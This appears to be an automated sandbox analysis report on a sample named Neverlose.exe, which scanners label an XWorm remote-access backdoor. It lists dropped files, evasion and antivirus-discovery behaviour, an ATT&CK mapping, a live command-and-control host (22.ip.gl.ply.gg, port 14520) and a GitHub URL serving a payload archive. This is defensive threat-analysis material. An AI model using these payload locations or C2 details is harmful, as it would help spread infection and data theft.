                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Solara.exe VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeQueries volume information: C:\Users\user\AppData\Roaming\sv_chost.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeQueries volume information: C:\Users\user\AppData\Roaming\sv_chost.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeQueries volume information: C:\Users\user\AppData\Roaming\sv_chost.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Neverlose.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Solara.exe, 00000004.00000002.2921766888.000000001C174000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000004.00000002.2921766888.000000001C0C0000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000004.00000002.2921766888.000000001C143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: Solara.exe, 00000004.00000002.2921766888.000000001C143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: 4.0.Solara.exe.da0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Neverlose.exe.3942eb0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Neverlose.exe.3939200.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000000.1722027125.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Neverlose.exe PID: 5888, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Solara.exe PID: 7184, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Solara.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\sv_chost.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: 4.0.Solara.exe.da0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Neverlose.exe.3942eb0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Neverlose.exe.3939200.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000000.1722027125.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Neverlose.exe PID: 5888, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Solara.exe PID: 7184, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Solara.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\sv_chost.exe, type: DROPPED

MITRE ATT&CK Matrix

Techniques are grouped by tactic column. Leading digits are the report's own per-technique signature-count markers, kept as extracted; entries without a digit are the matrix's placeholder cells with no matched signature.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 11 Windows Management Instrumentation; 1 Scheduled Task/Job; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 Scheduled Task/Job; 121 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 11 Process Injection; 1 Scheduled Task/Job; 121 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 231 Virtualization/Sandbox Evasion; 11 Process Injection; 11 Deobfuscate/Decode Files or Information; 31 Obfuscated Files or Information; 42 Software Packing; 1 Timestomp; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 321 Security Software Discovery; 1 Process Discovery; 231 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 13 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 11 Encrypted Channel; 1 Non-Standard Port; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID 1498483, sample Neverlose.exe, start date 24/08/2024, architecture WINDOWS, score 100)

Resolved hosts: 22.ip.gl.ply.gg; raw.githubusercontent.com; github.com
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures
Processes at the top level: Neverlose.exe; sv_chost.exe; Solara.exe; 3 other processes

Neverlose.exe
  Dropped: C:\Users\user\...\SolaraBootstrapper.exe (PE32); C:\Users\user\AppData\Local\Temp\Solara.exe (PE32); C:\Users\user\AppData\...\Neverlose.exe.log (ASCII)
  Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Creates multiple autostart registry keys; 3 other signatures
  Started: Solara.exe; SolaraBootstrapper.exe; powershell.exe

sv_chost.exe
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

Solara.exe (started by Neverlose.exe)
  Network: 22.ip.gl.ply.gg 147.185.221.22, destination port 14520 (source ports 49740, 49741), SALSGIVERUS, United States
  Dropped: C:\Users\user\AppData\Roaming\sv_chost.exe (PE32)
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 5 other signatures
  Started: powershell.exe (three instances); 2 other processes

SolaraBootstrapper.exe (started by Neverlose.exe)
  Network: github.com 140.82.121.4, destination port 443 (source ports 49730, 49732), GITHUBUS, United States; raw.githubusercontent.com 185.199.109.133, destination port 443 (source port 49731), FASTLYUS, Netherlands
  Started: conhost.exe

powershell.exe (started by Neverlose.exe)
  Signatures: Loading BitLocker PowerShell Module
  Started: conhost.exe

powershell.exe (first instance started by Solara.exe)
  Signatures: Loading BitLocker PowerShell Module
  Started: conhost.exe

The remaining powershell.exe instances and the 2 other processes started by Solara.exe each started conhost.exe.

Source | Detection | Scanner | Label | Link
Neverlose.exe | 41% | Virustotal | | Browse
Neverlose.exe | 74% | ReversingLabs | Win32.Backdoor.Xworm |
Neverlose.exe | 100% | Avira | HEUR/AGEN.1308820 |
Neverlose.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\Solara.exe | 100% | Avira | TR/Spy.Gen |
C:\Users\user\AppData\Roaming\sv_chost.exe | 100% | Avira | TR/Spy.Gen |
C:\Users\user\AppData\Local\Temp\Solara.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\sv_chost.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\Solara.exe | 76% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT |
C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | 33% | ReversingLabs | Win32.PUA.Packunwan |
C:\Users\user\AppData\Roaming\sv_chost.exe | 76% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT |

No Antivirus matches
Source | Detection | Scanner | Label | Link
22.ip.gl.ply.gg | 4% | Virustotal | | Browse
github.com | 0% | Virustotal | | Browse
raw.githubusercontent.com | 0% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
http://crl.mic | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://github.com/solutions/industries/financial-services | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-55a9038b | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/github-mark-57519b92ca4e.png | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_ | 0% | Avira URL Cloud | safe |
https://github.com/solutions/industries/financial-services | 1% | Virustotal | | Browse
https://github.githubassets.com/assets/github-mark-57519b92ca4e.png | 0% | Virustotal | | Browse
https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j | 0% | Virustotal | | Browse
https://github.com/solutions/devsecops | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo | 1% | Virustotal | | Browse
https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-85 | 0% | Avira URL Cloud | safe |
https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt | 0% | Avira URL Cloud | safe |
https://github.com/readme | 0% | Avira URL Cloud | safe |
https://github.com/customer-stories | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser | 0% | Virustotal | | Browse
https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-85 | 0% | Virustotal | | Browse
https://github.githubassets.com/assets/element-registry-ee3b4c180fee.js | 0% | Avira URL Cloud | safe |
https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt | 1% | Virustotal | | Browse
https://github.com/features | 0% | Avira URL Cloud | safe |
https://github.com/features/code-review | 0% | Avira URL Cloud | safe |
https://github.com/customer-stories | 1% | Virustotal | | Browse
https://github.com/readme | 1% | Virustotal | | Browse
https://github.com/features/issues | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-55a9038b | 0% | Virustotal | | Browse
https://github.com/solutions/devsecops | 1% | Virustotal | | Browse
https://github.com/features/code-review | 0% | Virustotal | | Browse
https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_ | 0% | Virustotal | | Browse
https://user-images.githubusercontent.com/ | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/element-registry-ee3b4c180fee.js | 0% | Virustotal | | Browse
https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js- | 0% | Avira URL Cloud | safe |
https://github.com/features/issues | 0% | Virustotal | | Browse
https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png | 0% | Avira URL Cloud | safe |
https://skills.github.com | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_ | 0% | Avira URL Cloud | safe |
https://user-images.githubusercontent.com/ | 0% | Virustotal | | Browse
https://github.com/solutions/industries/manufacturing | 0% | Avira URL Cloud | safe |
https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip" | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png | 0% | Virustotal | | Browse
https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js- | 1% | Virustotal | | Browse
https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_ | 0% | Avira URL Cloud | safe |
https://api.github.com/_private/browser/stats | 0% | Avira URL Cloud | safe |
https://github.com/solutions/industries/manufacturing | 1% | Virustotal | | Browse
https://github.com/features | 0% | Virustotal | | Browse
https://skills.github.com | 0% | Virustotal | | Browse
https://github.githubassets.com/assets/vendors-node_modules_gith | 0% | Avira URL Cloud | safe |
https://api.github.com/_private/browser/stats | 0% | Virustotal | | Browse
https://github.com/solutions/devops | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_ | 1% | Virustotal | | Browse
https://github.githubassets.com/assets/vendors-node_modules_gith | 1% | Virustotal | | Browse
https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_ | 0% | Virustotal | | Browse
https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css | 0% | Virustotal | | Browse
https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_ | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/primer-9f7b2e63c497.css | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_ | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/wp-runtime-9a56ebf061bf.js | 0% | Avira URL Cloud | safe |
https://github.com/solutions/devops | 1% | Virustotal | | Browse
https://github.com/te | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_ | 0% | Virustotal | | Browse
https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_e | 0% | Avira URL Cloud | safe |
https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip" | 1% | Virustotal | | Browse
https://github.githubassets.com/assets/primer-9f7b2e63c497.css | 0% | Virustotal | | Browse
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_e | 0% | Virustotal | | Browse
https://docs.github.com/get-started/accessibility/keyboard-shortcuts | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js | 0% | Virustotal | | Browse
https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-a2009221d1 | 0% | Avira URL Cloud | safe |
https://github.com/te | 0% | Virustotal | | Browse
https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_ | 0% | Virustotal | | Browse
https://github.com/features/packages | 0% | Avira URL Cloud | safe |
https://docs.github.com/get-started/accessibility/keyboard-shortcuts | 0% | Virustotal | | Browse
https://github.githubassets.com/assets/wp-runtime-9a56ebf061bf.js | 0% | Virustotal | | Browse
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png | 0% | Virustotal | | Browse
https://github.com/features/packages | 0% | Virustotal | | Browse
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/ui_packages_updatable-content_upd | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu | 0% | Avira URL Cloud | safe |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal | | Browse
https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j | 0% | Avira URL Cloud | safe |
https://resources.github.com/learn/pathways | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js | 0% | Avira URL Cloud | safe |
https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-a2009221d1 | 0% | Virustotal | | Browse
https://github.com/trending | 0% | Avira URL Cloud | safe |
https://raw.githubusercontent.com | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
22.ip.gl.ply.gg | 147.185.221.22 | true | true | - | unknown
github.com | 140.82.121.4 | true | false | - | unknown
raw.githubusercontent.com | 185.199.109.133 | true | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
22.ip.gl.ply.gg | true | Avira URL Cloud: malware | unknown
